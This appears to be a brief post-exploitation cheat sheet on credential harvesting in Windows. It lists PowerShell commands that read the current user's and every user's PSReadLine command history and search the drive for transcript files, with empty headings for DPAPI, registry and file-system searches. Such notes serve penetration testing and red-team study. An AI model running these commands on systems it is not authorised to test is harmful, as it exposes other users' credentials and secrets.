Credential Harvesting {} Post Exploitation
By l1nuxkid
Checklist (Run First)
PowerShell History
# Get history file path
(Get-PSReadlineOption).HistorySavePath
# Read it
cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# All users
foreach($user in ((ls C:\users).fullname)){
cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue
}
# Transcripts
gci C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter *transcript*.txt
type C:\Users\Public\Transcripts\transcript01.txtDPAPI / Stored Credentials
Registry Hunting
File System Searching
Automated Tools
Last updated